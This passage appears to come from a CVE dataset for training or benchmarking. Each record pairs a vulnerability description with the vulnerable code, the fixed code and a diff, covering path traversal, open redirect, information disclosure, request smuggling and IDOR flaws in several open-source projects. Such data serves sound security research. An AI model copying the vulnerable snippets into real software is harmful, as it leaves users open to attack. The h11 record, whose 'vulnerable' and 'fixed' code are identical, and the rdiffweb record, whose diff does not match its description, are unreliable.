os.remove(\"Songs/\" + value.replace(\".mid\", file_type))\n except:\n pass\n\n try:\n os.remove(\"Songs/cache/\" + value + \".p\")\n except:\n print(\"No cache file for \" + value)\n\n return jsonify(success=True, reload_songs=True)\n\n if setting_name == \"download_song\":\n if \"_main\" in value:\n zipObj = ZipFile(\"Songs/\" + value.replace(\".mid\", \"\") + \".zip\", 'w')\n name_no_suffix = value.replace(\"_main.mid\", \"\")\n songs_count = 0\n for fname in os.listdir('Songs'):\n if name_no_suffix in fname and 
\".zip\" not in fname:\n songs_count += 1\n zipObj.write(\"Songs/\" + fname)\n zipObj.close()\n if songs_count == 1:\n os.remove(\"Songs/\" + value.replace(\".mid\", \"\") + \".zip\")\n return send_file(\"../Songs/\" + value, mimetype='application/x-csv', attachment_filename=value,\n as_attachment=True)\n else:\n return send_file(\"../Songs/\" + value.replace(\".mid\", \"\") + \".zip\", mimetype='application/x-csv',\n attachment_filename=value.replace(\".mid\", \"\") + \".zip\", as_attachment=True)\n else:\n return send_file(safe_join(\"../Songs/\" + value), mimetype='application/x-csv', attachment_filename=value,\n as_attachment=True)\n\n if setting_name == \"download_sheet_music\":\n file_types = [\".musicxml\", \".xml\", \".mxl\", \".abc\"]\n i = 0\n while i < len(file_types):\n try:\n new_name = value.replace(\".mid\", file_types[i])\n return send_file(\"../Songs/\" + new_name, mimetype='application/x-csv', attachment_filename=new_name,\n as_attachment=True)\n except:\n i += 1\n webinterface.learning.convert_midi_to_abc(value)\n try:\n return send_file(safe_join(\"../Songs/\", value.replace(\".mid\", \".abc\")), mimetype='application/x-csv',\n attachment_filename=value.replace(\".mid\", \".abc\"), as_attachment=True)\n except:\n print(\"Converting failed\")\n\n\n if setting_name == \"start_midi_play\":\n webinterface.saving.t = threading.Thread(target=play_midi, args=(value, webinterface.midiports,\n webinterface.saving, webinterface.menu,\n webinterface.ledsettings,\n webinterface.ledstrip))\n webinterface.saving.t.start()\n\n return jsonify(success=True, reload_songs=True)\n\n if setting_name == \"stop_midi_play\":\n webinterface.saving.is_playing_midi.clear()\n fastColorWipe(webinterface.ledstrip.strip, True, webinterface.ledsettings)\n\n return jsonify(success=True, reload_songs=True)\n\n if setting_name == \"learning_load_song\":\n webinterface.learning.t = threading.Thread(target=webinterface.learning.load_midi, args=(value,))\n webinterface.learning.t.start()\n\n return jsonify(success=True, reload_learning_settings=True)\n\n if setting_name == \"start_learning_song\":\n webinterface.learning.t = threading.Thread(target=webinterface.learning.learn_midi)\n webinterface.learning.t.start()\n\n return jsonify(success=True)\n\n if setting_name == \"stop_learning_song\":\n webinterface.learning.is_started_midi = False\n fastColorWipe(webinterface.ledstrip.strip, True, webinterface.ledsettings)\n\n return jsonify(success=True)\n\n if setting_name == \"change_practice\":\n value = int(value)\n webinterface.learning.practice = value\n webinterface.learning.practice = clamp(webinterface.learning.practice, 0, len(webinterface.learning.practiceList) - 1)\n webinterface.usersettings.change_setting_value(\"practice\", webinterface.learning.practice)\n\n return jsonify(success=True)\n\n if setting_name == \"change_tempo\":\n value = int(value)\n webinterface.learning.set_tempo = value\n webinterface.learning.set_tempo = clamp(webinterface.learning.set_tempo, 10, 200)\n webinterface.usersettings.change_setting_value(\"set_tempo\", webinterface.learning.set_tempo)\n\n return jsonify(success=True)\n\n if setting_name == \"change_hands\":\n value = int(value)\n webinterface.learning.hands = value\n webinterface.learning.hands = clamp(webinterface.learning.hands, 0, len(webinterface.learning.handsList) - 1)\n webinterface.usersettings.change_setting_value(\"hands\", webinterface.learning.hands)\n\n return jsonify(success=True)\n\n if setting_name == \"change_mute_hand\":\n value = int(value)\n 
webinterface.learning.mute_hand = value\n webinterface.learning.mute_hand = clamp(webinterface.learning.mute_hand, 0, len(webinterface.learning.mute_handList) - 1)\n webinterface.usersettings.change_setting_value(\"mute_hand\", webinterface.learning.mute_hand)\n\n return jsonify(success=True)\n\n if setting_name == \"learning_start_point\":\n value = int(value)\n webinterface.learning.start_point = value\n webinterface.learning.start_point = clamp(webinterface.learning.start_point, 0, webinterface.learning.end_point - 1)\n webinterface.usersettings.change_setting_value(\"start_point\", webinterface.learning.start_point)\n webinterface.learning.restart_learning()\n\n return jsonify(success=True)\n\n if setting_name == \"learning_end_point\":\n value = int(value)\n webinterface.learning.end_point = value\n webinterface.learning.end_point = clamp(webinterface.learning.end_point, webinterface.learning.start_point + 1, 100)\n webinterface.usersettings.change_setting_value(\"end_point\", webinterface.learning.end_point)\n webinterface.learning.restart_learning()\n\n return jsonify(success=True)\n\n if setting_name == \"set_current_time_as_start_point\":\n webinterface.learning.start_point = round(float(webinterface.learning.current_idx * 100 / float(len(webinterface.learning.song_tracks))), 3)\n webinterface.learning.start_point = clamp(webinterface.learning.start_point, 0, webinterface.learning.end_point - 1)\n webinterface.usersettings.change_setting_value(\"start_point\", webinterface.learning.start_point)\n webinterface.learning.restart_learning()\n\n return jsonify(success=True, reload_learning_settings=True)\n\n if setting_name == \"set_current_time_as_end_point\":\n webinterface.learning.end_point = round(float(webinterface.learning.current_idx * 100 / float(len(webinterface.learning.song_tracks))), 3)\n webinterface.learning.end_point = clamp(webinterface.learning.end_point, webinterface.learning.start_point + 1, 100)\n webinterface.usersettings.change_setting_value(\"end_point\", webinterface.learning.end_point)\n webinterface.learning.restart_learning()\n\n return jsonify(success=True, reload_learning_settings=True)\n\n if setting_name == \"change_handL_color\":\n value = int(value)\n webinterface.learning.hand_colorL += value\n webinterface.learning.hand_colorL = clamp(webinterface.learning.hand_colorL, 0, len(webinterface.learning.hand_colorList) - 1)\n webinterface.usersettings.change_setting_value(\"hand_colorL\", webinterface.learning.hand_colorL)\n\n return jsonify(success=True, reload_learning_settings=True)\n\n if setting_name == \"change_handR_color\":\n value = int(value)\n webinterface.learning.hand_colorR += value\n webinterface.learning.hand_colorR = clamp(webinterface.learning.hand_colorR, 0, len(webinterface.learning.hand_colorList) - 1)\n webinterface.usersettings.change_setting_value(\"hand_colorR\", webinterface.learning.hand_colorR)\n\n return jsonify(success=True, reload_learning_settings=True)\n\n if setting_name == \"change_learning_loop\":\n value = int(value == 'true')\n webinterface.learning.is_loop_active = value\n webinterface.usersettings.change_setting_value(\"is_loop_active\", webinterface.learning.is_loop_active)\n\n return jsonify(success=True)\n\n\n return jsonify(success=True)"}], "vul_patch": "--- a/webinterface/views_api.py\n+++ b/webinterface/views_api.py\n@@ -823,7 +823,7 @@\n return send_file(\"../Songs/\" + value.replace(\".mid\", \"\") + \".zip\", mimetype='application/x-csv',\n attachment_filename=value.replace(\".mid\", \"\") + \".zip\", 
as_attachment=True)\n else:\n- return send_file(\"../Songs/\" + value, mimetype='application/x-csv', attachment_filename=value,\n+ return send_file(safe_join(\"../Songs/\" + value), mimetype='application/x-csv', attachment_filename=value,\n as_attachment=True)\n \n if setting_name == \"download_sheet_music\":\n@@ -838,7 +838,7 @@\n i += 1\n webinterface.learning.convert_midi_to_abc(value)\n try:\n- return send_file(\"../Songs/\" + value.replace(\".mid\", \".abc\"), mimetype='application/x-csv',\n+ return send_file(safe_join(\"../Songs/\", value.replace(\".mid\", \".abc\")), mimetype='application/x-csv',\n attachment_filename=value.replace(\".mid\", \".abc\"), as_attachment=True)\n except:\n print(\"Converting failed\")\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2022-1058", "cve_description": "Open Redirect on login in GitHub repository go-gitea/gitea prior to 1.16.5.", "cwe_info": {"CWE-601": {"name": "URL Redirection to Untrusted Site ('Open Redirect')", "description": "The web application accepts a user-controlled input that specifies a link to an external site, and uses that link in a redirect."}}, "repo": "https://github.com/go-gitea/gitea", "patch_url": ["https://github.com/go-gitea/gitea/commit/e3d8e92bdc67562783de9a76b5b7842b68daeb48"], "programing_language": "Go", "vul_func": [{"id": "vul_go_250_1", "commit": "6fc73a84332643ffbd431f6e7fcb16942c505c04", "file_path": "modules/context/context.go", "start_line": 178, "end_line": 194, "snippet": "func (ctx *Context) RedirectToFirst(location ...string) {\n\tfor _, loc := range location {\n\t\tif len(loc) == 0 {\n\t\t\tcontinue\n\t\t}\n\n\t\tu, err := url.Parse(loc)\n\t\tif err != nil || ((u.Scheme != \"\" || u.Host != \"\") && !strings.HasPrefix(strings.ToLower(loc), strings.ToLower(setting.AppURL))) {\n\t\t\tcontinue\n\t\t}\n\n\t\tctx.Redirect(loc)\n\t\treturn\n\t}\n\n\tctx.Redirect(setting.AppSubURL + \"/\")\n}"}], "fix_func": [{"id": "fix_go_250_1", "commit": "e3d8e92bdc67562783de9a76b5b7842b68daeb48", "file_path": "modules/context/context.go", "start_line": 178, "end_line": 200, "snippet": "func (ctx *Context) RedirectToFirst(location ...string) {\n\tfor _, loc := range location {\n\t\tif len(loc) == 0 {\n\t\t\tcontinue\n\t\t}\n\n\t\t// Unfortunately browsers consider a redirect Location with preceding \"//\" and \"/\\\" as meaning redirect to \"http(s)://REST_OF_PATH\"\n\t\t// Therefore we should ignore these redirect locations to prevent open redirects\n\t\tif len(loc) > 1 && loc[0] == '/' && (loc[1] == '/' || loc[1] == '\\\\') {\n\t\t\tcontinue\n\t\t}\n\n\t\tu, err := url.Parse(loc)\n\t\tif err != nil || ((u.Scheme != \"\" || u.Host != \"\") && !strings.HasPrefix(strings.ToLower(loc), strings.ToLower(setting.AppURL))) {\n\t\t\tcontinue\n\t\t}\n\n\t\tctx.Redirect(loc)\n\t\treturn\n\t}\n\n\tctx.Redirect(setting.AppSubURL + \"/\")\n}"}], "vul_patch": "--- a/modules/context/context.go\n+++ b/modules/context/context.go\n@@ -1,6 +1,12 @@\n func (ctx *Context) RedirectToFirst(location ...string) {\n \tfor _, loc := range location {\n \t\tif len(loc) == 0 {\n+\t\t\tcontinue\n+\t\t}\n+\n+\t\t// Unfortunately browsers consider a redirect Location with preceding \"//\" and \"/\\\" as meaning redirect to \"http(s)://REST_OF_PATH\"\n+\t\t// Therefore we should ignore these redirect locations to prevent open redirects\n+\t\tif len(loc) > 1 && loc[0] == '/' && (loc[1] == '/' || loc[1] == '\\\\') {\n \t\t\tcontinue\n \t\t}\n \n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2024-56136", "cve_description": 
"Zulip server provides an open-source team chat that helps teams stay productive and focused. Zulip Server 7.0 and above are vulnerable to an information disclose attack, where, if a Zulip server is hosting multiple organizations, an unauthenticated user can make a request and determine if an email address is in use by a user. Zulip Server 9.4 resolves the issue, as does the `main` branch of Zulip Server. Users are advised to upgrade. There are no known workarounds for this issue.", "cwe_info": {"CWE-200": {"name": "Exposure of Sensitive Information to an Unauthorized Actor", "description": "The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information."}}, "repo": "https://github.com/zulip/zulip", "patch_url": ["https://github.com/zulip/zulip/commit/c6334a765b1e6d71760e4a3b32ae5b8367f2ed4d"], "programing_language": "Python", "vul_func": [{"id": "vul_py_344_1", "commit": "ff5512e5a93ac3ecf327288b3f37e032de0aaf81", "file_path": "zerver/views/auth.py", "start_line": 989, "end_line": 1001, "snippet": "def get_api_key_fetch_authenticate_failure(return_data: dict[str, bool]) -> JsonableError:\n if return_data.get(\"inactive_user\"):\n return UserDeactivatedError()\n if return_data.get(\"inactive_realm\"):\n return RealmDeactivatedError()\n if return_data.get(\"password_auth_disabled\"):\n return PasswordAuthDisabledError()\n if return_data.get(\"password_reset_needed\"):\n return PasswordResetRequiredError()\n if return_data.get(\"invalid_subdomain\"):\n raise InvalidSubdomainError\n\n return AuthenticationFailedError()"}], "fix_func": [{"id": "fix_py_344_1", "commit": "c6334a765b1e6d71760e4a3b32ae5b8367f2ed4d", "file_path": "zerver/views/auth.py", "start_line": 989, "end_line": 1004, "snippet": "def get_api_key_fetch_authenticate_failure(return_data: dict[str, bool]) -> JsonableError:\n if return_data.get(\"inactive_user\"):\n return UserDeactivatedError()\n if return_data.get(\"inactive_realm\"):\n return RealmDeactivatedError()\n if return_data.get(\"password_auth_disabled\"):\n return PasswordAuthDisabledError()\n if return_data.get(\"password_reset_needed\"):\n return PasswordResetRequiredError()\n if return_data.get(\"invalid_subdomain\"):\n # We must not report invalid_subdomain here; that value is intended only for informing server logs,\n # and should never be exposed to end users, since it would leak whether there exists\n # an account in a different organization with the same email address.\n return AuthenticationFailedError()\n\n return AuthenticationFailedError()"}], "vul_patch": "--- a/zerver/views/auth.py\n+++ b/zerver/views/auth.py\n@@ -8,6 +8,9 @@\n if return_data.get(\"password_reset_needed\"):\n return PasswordResetRequiredError()\n if return_data.get(\"invalid_subdomain\"):\n- raise InvalidSubdomainError\n+ # We must not report invalid_subdomain here; that value is intended only for informing server logs,\n+ # and should never be exposed to end users, since it would leak whether there exists\n+ # an account in a different organization with the same email address.\n+ return AuthenticationFailedError()\n \n return AuthenticationFailedError()\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2025-43859", "cve_description": "h11 is a Python implementation of HTTP/1.1. Prior to version 0.16.0, a leniency in h11's parsing of line terminators in chunked-coding message bodies can lead to request smuggling vulnerabilities under certain conditions. This issue has been patched in version 0.16.0. 
Since exploitation requires the combination of buggy h11 with a buggy (reverse) proxy, fixing either component is sufficient to mitigate this issue.", "cwe_info": {"CWE-444": {"name": "Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')", "description": "The product acts as an intermediary HTTP agent\n (such as a proxy or firewall) in the data flow between two\n entities such as a client and server, but it does not\n interpret malformed HTTP requests or responses in ways that\n are consistent with how the messages will be processed by\n those entities that are at the ultimate destination."}}, "repo": "https://github.com/python-hyper/h11", "patch_url": ["https://github.com/python-hyper/h11/commit/114803a29ce50116dc47951c690ad4892b1a36ed"], "programing_language": "Python", "vul_func": [{"id": "vul_py_68_1", "commit": "114803a29ce50116dc47951c690ad4892b1a36ed", "file_path": "h11/_readers.py", "start_line": 149, "end_line": 154, "snippet": " def __init__(self) -> None:\n self._bytes_in_chunk = 0\n # After reading a chunk, we have to throw away the trailing \\r\\n.\n # This tracks the bytes that we need to match and throw away.\n self._bytes_to_discard = b\"\"\n self._reading_trailer = False"}, {"id": "vul_py_68_2", "commit": "114803a29ce50116dc47951c690ad4892b1a36ed", "file_path": "h11/_readers.py", "start_line": 156, "end_line": 204, "snippet": " def __call__(self, buf: ReceiveBuffer) -> Union[Data, EndOfMessage, None]:\n if self._reading_trailer:\n lines = buf.maybe_extract_lines()\n if lines is None:\n return None\n return EndOfMessage(headers=list(_decode_header_lines(lines)))\n if self._bytes_to_discard:\n data = buf.maybe_extract_at_most(len(self._bytes_to_discard))\n if data is None:\n return None\n if data != self._bytes_to_discard[:len(data)]:\n raise LocalProtocolError(\n f\"malformed chunk footer: {data!r} (expected {self._bytes_to_discard!r})\"\n )\n self._bytes_to_discard = self._bytes_to_discard[len(data):]\n if self._bytes_to_discard:\n return None\n # else, fall through and read some more\n assert self._bytes_to_discard == b\"\"\n if self._bytes_in_chunk == 0:\n # We need to refill our chunk count\n chunk_header = buf.maybe_extract_next_line()\n if chunk_header is None:\n return None\n matches = validate(\n chunk_header_re,\n chunk_header,\n \"illegal chunk header: {!r}\",\n chunk_header,\n )\n # XX FIXME: we discard chunk extensions. 
Does anyone care?\n self._bytes_in_chunk = int(matches[\"chunk_size\"], base=16)\n if self._bytes_in_chunk == 0:\n self._reading_trailer = True\n return self(buf)\n chunk_start = True\n else:\n chunk_start = False\n assert self._bytes_in_chunk > 0\n data = buf.maybe_extract_at_most(self._bytes_in_chunk)\n if data is None:\n return None\n self._bytes_in_chunk -= len(data)\n if self._bytes_in_chunk == 0:\n self._bytes_to_discard = b\"\\r\\n\"\n chunk_end = True\n else:\n chunk_end = False\n return Data(data=data, chunk_start=chunk_start, chunk_end=chunk_end)"}], "fix_func": [{"id": "fix_py_68_1", "commit": "114803a29ce50116dc47951c690ad4892b1a36ed", "file_path": "h11/_readers.py", "start_line": 149, "end_line": 154, "snippet": " def __init__(self) -> None:\n self._bytes_in_chunk = 0\n # After reading a chunk, we have to throw away the trailing \\r\\n.\n # This tracks the bytes that we need to match and throw away.\n self._bytes_to_discard = b\"\"\n self._reading_trailer = False"}, {"id": "fix_py_68_2", "commit": "114803a29ce50116dc47951c690ad4892b1a36ed", "file_path": "h11/_readers.py", "start_line": 156, "end_line": 204, "snippet": " def __call__(self, buf: ReceiveBuffer) -> Union[Data, EndOfMessage, None]:\n if self._reading_trailer:\n lines = buf.maybe_extract_lines()\n if lines is None:\n return None\n return EndOfMessage(headers=list(_decode_header_lines(lines)))\n if self._bytes_to_discard:\n data = buf.maybe_extract_at_most(len(self._bytes_to_discard))\n if data is None:\n return None\n if data != self._bytes_to_discard[:len(data)]:\n raise LocalProtocolError(\n f\"malformed chunk footer: {data!r} (expected {self._bytes_to_discard!r})\"\n )\n self._bytes_to_discard = self._bytes_to_discard[len(data):]\n if self._bytes_to_discard:\n return None\n # else, fall through and read some more\n assert self._bytes_to_discard == b\"\"\n if self._bytes_in_chunk == 0:\n # We need to refill our chunk count\n chunk_header = buf.maybe_extract_next_line()\n if chunk_header is None:\n return None\n matches = validate(\n chunk_header_re,\n chunk_header,\n \"illegal chunk header: {!r}\",\n chunk_header,\n )\n # XX FIXME: we discard chunk extensions. 
Does anyone care?\n self._bytes_in_chunk = int(matches[\"chunk_size\"], base=16)\n if self._bytes_in_chunk == 0:\n self._reading_trailer = True\n return self(buf)\n chunk_start = True\n else:\n chunk_start = False\n assert self._bytes_in_chunk > 0\n data = buf.maybe_extract_at_most(self._bytes_in_chunk)\n if data is None:\n return None\n self._bytes_in_chunk -= len(data)\n if self._bytes_in_chunk == 0:\n self._bytes_to_discard = b\"\\r\\n\"\n chunk_end = True\n else:\n chunk_end = False\n return Data(data=data, chunk_start=chunk_start, chunk_end=chunk_end)"}], "vul_patch": "\n\n\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2025-43859:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/h11\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\n/workspace/PoC_env/CVE-2025-43859/bin/python -m pytest h11/tests/test_io.py -k \"t_body_reader or test_ChunkedReader or test_ContentLengthWriter\"\n", "unit_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2025-43859:latest\n# bash /workspace/unit_test.sh\nset -e\n\ncd /workspace/h11\ngit apply --whitespace=nowarn /workspace/test.patch\n/workspace/PoC_env/CVE-2025-43859/bin/python -m pytest h11/tests/test_io.py -k \"not test_ChunkedReader\" -p no:warning --disable-warnings\n"} {"cve_id": "CVE-2022-4720", "cve_description": "Open Redirect in GitHub repository ikus060/rdiffweb prior to 2.5.5.", "cwe_info": {"CWE-601": {"name": "URL Redirection to Untrusted Site ('Open Redirect')", "description": "The web application accepts a user-controlled input that specifies a link to an external site, and uses that link in a redirect."}}, "repo": "https://github.com/ikus060/rdiffweb", "patch_url": ["https://github.com/ikus060/rdiffweb/commit/6afaae56a29536f0118b3380d296c416aa6d078d"], "programing_language": "Python", "vul_func": [{"id": "vul_py_147_1", "commit": "b0c1422", "file_path": "rdiffweb/core/notification.py", "start_line": 66, "end_line": 78, "snippet": " def access_token_added(self, userobj, name):\n if not self.send_changed:\n return\n\n if not userobj.email:\n logger.info(\"can't sent mail to user [%s] without an email\", userobj.username)\n return\n\n # Send a mail notification\n body = self.app.templates.compile_template(\n \"access_token_added.html\", **{\"header_name\": self.app.cfg.header_name, 'user': userobj, 'name': name}\n )\n self.bus.publish('queue_mail', to=userobj.email, subject=_(\"A new access token has been created\"), message=body)"}, {"id": "vul_py_147_2", "commit": "b0c1422", "file_path": "rdiffweb/core/notification.py", "start_line": 111, "end_line": 123, "snippet": " def user_password_changed(self, userobj):\n if not self.send_changed:\n return\n\n if not userobj.email:\n logger.info(\"can't sent mail to user [%s] without an email\", userobj.username)\n return\n\n # If the email attributes was changed, send a mail notification.\n body = self.app.templates.compile_template(\n \"password_changed.html\", **{\"header_name\": self.app.cfg.header_name, 'user': userobj}\n )\n self.bus.publish('queue_mail', to=userobj.email, subject=_(\"Password changed\"), message=body)"}], "fix_func": [{"id": "fix_py_147_1", "commit": "6afaae5", "file_path": "rdiffweb/core/notification.py", "start_line": 66, "end_line": 78, "snippet": " def access_token_added(self, userobj, name):\n if not self.send_changed:\n return\n\n if not userobj.email:\n logger.info(\"can't sent mail to user [%s] without an email\", userobj.username)\n return\n\n # Send a mail notification\n body = 
self.app.templates.compile_template(\n \"email_access_token_added.html\", **{\"header_name\": self.app.cfg.header_name, 'user': userobj, 'name': name}\n )\n self.bus.publish('queue_mail', to=userobj.email, subject=_(\"A new access token has been created\"), message=body)"}, {"id": "fix_py_147_2", "commit": "6afaae5", "file_path": "rdiffweb/core/notification.py", "start_line": 111, "end_line": 123, "snippet": " def user_password_changed(self, userobj):\n if not self.send_changed:\n return\n\n if not userobj.email:\n logger.info(\"can't sent mail to user [%s] without an email\", userobj.username)\n return\n\n # If the email attributes was changed, send a mail notification.\n body = self.app.templates.compile_template(\n \"email_password_changed.html\", **{\"header_name\": self.app.cfg.header_name, 'user': userobj}\n )\n self.bus.publish('queue_mail', to=userobj.email, subject=_(\"Password changed\"), message=body)"}], "vul_patch": "--- a/rdiffweb/core/notification.py\n+++ b/rdiffweb/core/notification.py\n@@ -8,6 +8,6 @@\n \n # Send a mail notification\n body = self.app.templates.compile_template(\n- \"access_token_added.html\", **{\"header_name\": self.app.cfg.header_name, 'user': userobj, 'name': name}\n+ \"email_access_token_added.html\", **{\"header_name\": self.app.cfg.header_name, 'user': userobj, 'name': name}\n )\n self.bus.publish('queue_mail', to=userobj.email, subject=_(\"A new access token has been created\"), message=body)\n\n--- a/rdiffweb/core/notification.py\n+++ b/rdiffweb/core/notification.py\n@@ -8,6 +8,6 @@\n \n # If the email attributes was changed, send a mail notification.\n body = self.app.templates.compile_template(\n- \"password_changed.html\", **{\"header_name\": self.app.cfg.header_name, 'user': userobj}\n+ \"email_password_changed.html\", **{\"header_name\": self.app.cfg.header_name, 'user': userobj}\n )\n self.bus.publish('queue_mail', to=userobj.email, subject=_(\"Password changed\"), message=body)\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2022-23470", "cve_description": "Galaxy is an open-source platform for data analysis. An arbitrary file read exists in Galaxy 22.01 and Galaxy 22.05 due to the switch to Gunicorn, which can be used to read any file accessible to the operating system user under which Galaxy is running. This vulnerability affects Galaxy 22.01 and higher, after the switch to gunicorn, which serves static content directly. Additionally, the vulnerability is mitigated when using Nginx or Apache to serve /static/* content, instead of Galaxy's internal middleware. This issue has been patched in commit `e5e6bda4f` and will be included in future releases. Users are advised to manually patch their installations. 
There are no known workarounds for this vulnerability.", "cwe_info": {"CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/galaxyproject/galaxy", "patch_url": ["https://github.com/galaxyproject/galaxy/commit/e5e6bda4f014f807ca77ee0cf6af777a55918346"], "programing_language": "Python", "vul_func": [{"id": "vul_py_108_1", "commit": "7136d72", "file_path": "lib/galaxy/web/framework/middleware/static.py", "start_line": 17, "end_line": 60, "snippet": " def __call__(self, environ, start_response):\n path_info = environ.get('PATH_INFO', '')\n if not path_info:\n # See if this is a static file hackishly mapped.\n if os.path.exists(self.directory) and os.path.isfile(self.directory):\n app = FileApp(self.directory)\n if self.cache_seconds:\n app.cache_control(max_age=int(self.cache_seconds))\n return app(environ, start_response)\n return self.add_slash(environ, start_response)\n if path_info == '/':\n # @@: This should obviously be configurable\n filename = 'index.html'\n else:\n filename = request.path_info_pop(environ)\n\n directory = self.directory\n host = environ.get('HTTP_HOST')\n if self.directory_per_host and host:\n for host_key, host_val in self.directory_per_host.items():\n if host_key in host:\n directory = host_val\n break\n\n full = os.path.join(directory, filename)\n if not os.path.exists(full):\n return self.not_found(environ, start_response)\n if os.path.isdir(full):\n # @@: Cache?\n return self.__class__(full)(environ, start_response)\n if environ.get('PATH_INFO') and environ.get('PATH_INFO') != '/':\n return self.error_extra_path(environ, start_response)\n if_none_match = environ.get('HTTP_IF_NONE_MATCH')\n if if_none_match:\n mytime = os.stat(full).st_mtime\n if str(mytime) == if_none_match:\n headers: List[Tuple[str, str]] = []\n ETAG.update(headers, mytime)\n start_response('304 Not Modified', headers)\n return [''] # empty body\n app = FileApp(full)\n if self.cache_seconds:\n app.cache_control(max_age=int(self.cache_seconds))\n return app(environ, start_response)"}], "fix_func": [{"id": "fix_py_108_1", "commit": "e5e6bda", "file_path": "lib/galaxy/web/framework/middleware/static.py", "start_line": 17, "end_line": 64, "snippet": " def __call__(self, environ, start_response):\n path_info = environ.get('PATH_INFO', '')\n if not path_info:\n # See if this is a static file hackishly mapped.\n if os.path.exists(self.directory) and os.path.isfile(self.directory):\n app = FileApp(self.directory)\n if self.cache_seconds:\n app.cache_control(max_age=int(self.cache_seconds))\n return app(environ, start_response)\n return self.add_slash(environ, start_response)\n if path_info == '/':\n # @@: This should obviously be configurable\n filename = 'index.html'\n else:\n filename = request.path_info_pop(environ)\n\n directory = self.directory\n host = environ.get('HTTP_HOST')\n if self.directory_per_host and host:\n for host_key, host_val in self.directory_per_host.items():\n if host_key in host:\n directory = host_val\n break\n\n full = self.normpath(os.path.join(directory, filename))\n if not full.startswith(directory):\n # Out of bounds\n return 
self.not_found(environ, start_response)\n\n if not os.path.exists(full):\n return self.not_found(environ, start_response)\n if os.path.isdir(full):\n # @@: Cache?\n return self.__class__(full)(environ, start_response)\n if environ.get('PATH_INFO') and environ.get('PATH_INFO') != '/':\n return self.error_extra_path(environ, start_response)\n if_none_match = environ.get('HTTP_IF_NONE_MATCH')\n if if_none_match:\n mytime = os.stat(full).st_mtime\n if str(mytime) == if_none_match:\n headers: List[Tuple[str, str]] = []\n ETAG.update(headers, mytime)\n start_response('304 Not Modified', headers)\n return [''] # empty body\n app = FileApp(full)\n if self.cache_seconds:\n app.cache_control(max_age=int(self.cache_seconds))\n return app(environ, start_response)"}], "vul_patch": "--- a/lib/galaxy/web/framework/middleware/static.py\n+++ b/lib/galaxy/web/framework/middleware/static.py\n@@ -22,7 +22,11 @@\n directory = host_val\n break\n \n- full = os.path.join(directory, filename)\n+ full = self.normpath(os.path.join(directory, filename))\n+ if not full.startswith(directory):\n+ # Out of bounds\n+ return self.not_found(environ, start_response)\n+\n if not os.path.exists(full):\n return self.not_found(environ, start_response)\n if os.path.isdir(full):\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2024-52294", "cve_description": "Khoj is a self-hostable artificial intelligence app. Prior to version 1.29.10, an Insecure Direct Object Reference (IDOR) vulnerability in the update_subscription endpoint allows any authenticated user to manipulate other users' Stripe subscriptions by simply modifying the email parameter in the request. The vulnerability exists in the subscription endpoint at `/api/subscription`. The endpoint uses an email parameter as a direct reference to user subscriptions without verifying object ownership. While authentication is required, there is no authorization check to verify if the authenticated user owns the referenced subscription. The issue was fixed in version 1.29.10. 
Support for arbitrarily presenting an email for update has been deprecated.", "cwe_info": {"CWE-862": {"name": "Missing Authorization", "description": "The product does not perform an authorization check when an actor attempts to access a resource or perform an action."}, "CWE-639": {"name": "Authorization Bypass Through User-Controlled Key", "description": "The system's authorization functionality does not prevent one user from gaining access to another user's data or record by modifying the key value identifying the data."}}, "repo": "https://github.com/khoj-ai/khoj", "patch_url": ["https://github.com/khoj-ai/khoj/commit/47d3c8c23597900af708bdc60aced3ae5d2064c1"], "programing_language": "Python", "vul_func": [{"id": "vul_py_286_1", "commit": "d702710", "file_path": "src/khoj/routers/api_subscription.py", "start_line": 97, "end_line": 120, "snippet": "async def update_subscription(request: Request, email: str, operation: str):\n # Retrieve the customer's details\n customers = stripe.Customer.list(email=email).auto_paging_iter()\n customer = next(customers, None)\n if customer is None:\n return {\"success\": False, \"message\": \"Customer not found\"}\n\n if operation == \"cancel\":\n customer_id = customer.id\n for subscription in stripe.Subscription.list(customer=customer_id):\n stripe.Subscription.modify(subscription.id, cancel_at_period_end=True)\n return {\"success\": True}\n\n elif operation == \"resubscribe\":\n subscriptions = stripe.Subscription.list(customer=customer.id).auto_paging_iter()\n # Find the subscription that is set to cancel at the end of the period\n for subscription in subscriptions:\n if subscription.cancel_at_period_end:\n # Update the subscription to not cancel at the end of the period\n stripe.Subscription.modify(subscription.id, cancel_at_period_end=False)\n return {\"success\": True}\n return {\"success\": False, \"message\": \"No subscription found that is set to cancel\"}\n\n return {\"success\": False, \"message\": \"Invalid operation\"}"}], "fix_func": [{"id": "fix_py_286_1", "commit": "47d3c8c23597900af708bdc60aced3ae5d2064c1", "file_path": "src/khoj/routers/api_subscription.py", "start_line": 97, "end_line": 121, "snippet": "async def update_subscription(request: Request, operation: str):\n # Retrieve the customer's details\n email = request.user.object.email\n customers = stripe.Customer.list(email=email).auto_paging_iter()\n customer = next(customers, None)\n if customer is None:\n return {\"success\": False, \"message\": \"Customer not found\"}\n\n if operation == \"cancel\":\n customer_id = customer.id\n for subscription in stripe.Subscription.list(customer=customer_id):\n stripe.Subscription.modify(subscription.id, cancel_at_period_end=True)\n return {\"success\": True}\n\n elif operation == \"resubscribe\":\n subscriptions = stripe.Subscription.list(customer=customer.id).auto_paging_iter()\n # Find the subscription that is set to cancel at the end of the period\n for subscription in subscriptions:\n if subscription.cancel_at_period_end:\n # Update the subscription to not cancel at the end of the period\n stripe.Subscription.modify(subscription.id, cancel_at_period_end=False)\n return {\"success\": True}\n return {\"success\": False, \"message\": \"No subscription found that is set to cancel\"}\n\n return {\"success\": False, \"message\": \"Invalid operation\"}"}], "vul_patch": "--- a/src/khoj/routers/api_subscription.py\n+++ 